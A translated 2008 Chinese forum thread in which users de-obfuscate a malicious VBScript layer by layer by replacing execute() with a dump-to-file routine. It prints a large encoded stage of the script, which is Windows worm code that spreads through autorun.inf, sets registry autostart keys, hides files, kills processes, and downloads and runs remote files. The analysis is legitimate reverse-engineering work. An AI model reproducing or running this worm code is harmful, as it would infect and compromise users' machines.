China DOS Union

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum

[Help] Help to decrypt a VBS
Floor 16 Posted 2008-01-16 12:56 · China, Beijing, Haidian District, China Unicom
Floor 17 Posted 2008-01-16 14:29 · China, Hebei, Baoding, China Unicom
Originally posted by uhnmki at 2008-1-16 12:56:
【Continuation 4】Open decode_5.txt and take a look. What is this stuff? It's so disappointing to everyone. How come there's only this little content? Did I get it wrong?

Sub Intercept (code)
WScript.Echo code
OutPutFile="decode_6.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write code
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
'**************Code to intercept the return value of the uc function, end


Because there is code that performs the replacement in a loop, it is recommended to use the OpenTextFile method... Also, use parameter 8, "append data mode", so that although duplicate code will be obtained, omissions can be avoided...
After running the code above with end sub added, the obtained code seems to have an error. It seems that the conversion of the " symbol after dyz= is wrong. Also, I just saw that the poster above hopes to post continuously. I'm really sorry...

[ Last edited by baomaboy on 2008-1-16 at 02:50 PM ]
Floor 18 Posted 2008-01-16 15:12 · China, Beijing, China Science and Technology Network
【Continuation 5】Now let's open decode_6.txt and see what the return value of the uc function generated at the end is:


on error resume next
dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg 
qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = 
perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr 
svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura 
ps=gehr":execute(ext&"dyz))"&ext&"zcx))"&fut&"gt()"&ext&"gtz"&aft&"ei(name,wt)"&ext&"eiz"&aft&"df(wh)"&ext&"dfz"&aft&"bf(wh,wt,da)"&ext&"bfz"&aft&"bi(wh)"&ext&"biz"&aft&"rt(wh,li)"&ext&"rtz"&aft&"wr(rna,rda)"&ext&"wrz"&aft&"rr(rna,pa)"&ext&"rrz"&aft&"ar(file,cg)"&ext&"arz"&aft&"dn(loc,web,ris,min)"&ext&"dnz"&aft&"pr(pcs,gs)"&ext&"prz"&aft&"ec(wt)"&ext&"ecz"&aft&"co(wh)"&ext&"coz"&aft&"rs(sw)"&ext&"rsz"&aft&"hi(sw)"&ext&"hiz"&aft&"gi(ids,fid,eid,fname,furl)"&ext&"giz"&aft&"dw(pcs,fn,furl,kill)"&ext&"dwz"&aft&"us(sw)"&ext&"usz"&aft&"cu()"&ext&"cuz"&aft&"km(sw)"&ext&"kmz"&aft&"cf(wh)"&ext&"cfz"&eft)
function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function

Wow, my god, it's still so messy. Dear readers, I'm sorry; it's a bit tiring on your eyes, and I'm sorry to have gotten you excited too early. But fortunately it's all ASCII, which is better than the garbled b=lO+qO. And there is so much of it, which means the ciphertext b=lO+qO must have been substituted in for decoding. Although it's a bit messy, I was like that at the beginning too; I got confused by two adjacent executes several times. But if you have the text editor EmEditor on hand, it's okay: it's clear at a glance. UEdit doesn't seem to work. Although UEdit has more functions than EmEditor, it's a bit stupid at this point. What EmEditor shows is similar to what I marked in the quote. That way you will immediately find that this is actually the assignment of several variables or strings, followed by an execute(code), which is the important part. It pushes the program on to the next step; otherwise it would stop here. In addition, a function er is brought along at the end, which also refers to a function called rr. Regardless, the focus must be on what is inside the parentheses of execute(). It seems that many variables have been assigned above. Yes, that's it. Once that code is decoded, it may be the plaintext (I'm a bit lacking in confidence). So I do the same as before and design an interception procedure, Intercept:

Sub Intercept (code)
WScript.Echo code
OutPutFile="decode_7.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write code
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub

Use Intercept() to replace the execute() and get the code to be executed. So transform the above result like this:


on error resume next
dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg 
qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = 
perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr 
svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura 
ps=gehr":Intercept(ext&"dyz))"&ext&"zcx))"&fut&"gt()"&ext&"gtz"&aft&"ei(name,wt)"&ext&"eiz"&aft&"df(wh)"&ext&"dfz"&aft&"bf(wh,wt,da)"&ext&"bfz"&aft&"bi(wh)"&ext&"biz"&aft&"rt(wh,li)"&ext&"rtz"&aft&"wr(rna,rda)"&ext&"wrz"&aft&"rr(rna,pa)"&ext&"rrz"&aft&"ar(file,cg)"&ext&"arz"&aft&"dn(loc,web,ris,min)"&ext&"dnz"&aft&"pr(pcs,gs)"&ext&"prz"&aft&"ec(wt)"&ext&"ecz"&aft&"co(wh)"&ext&"coz"&aft&"rs(sw)"&ext&"rsz"&aft&"hi(sw)"&ext&"hiz"&aft&"gi(ids,fid,eid,fname,furl)"&ext&"giz"&aft&"dw(pcs,fn,furl,kill)"&ext&"dwz"&aft&"us(sw)"&ext&"usz"&aft&"cu()"&ext&"cuz"&aft&"km(sw)"&ext&"kmz"&aft&"cf(wh)"&ext&"cfz"&eft)
function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function

'Use the procedure Intercept() to replace execute()
'**************Capture the code inside the parentheses of execute(), start
Sub Intercept (code)
WScript.Echo code
OutPutFile="decode_7.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write code
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub
'**************Capture the code inside the parentheses of execute(), end

Copy the above code and save it as Decoding_6th.vbs, run it, and the result is stored in decode_7.txt. This time I guarantee you will see the true lie. Really, I'm not lying to you. I didn't mean to lie to you before. Don't go away. Oh no, don't look for tomatoes and eggs first. Be patient. Give me some time, I have something to say... Oh my god... 【To be continued】

[ Last edited by uhnmki on 2008-1-16 at 07:28 PM ]
Floor 19 Posted 2008-01-16 19:38 · China, Beijing, Haidian District, China Unicom
**** Open decode_7.txt and see if the plaintext appears:


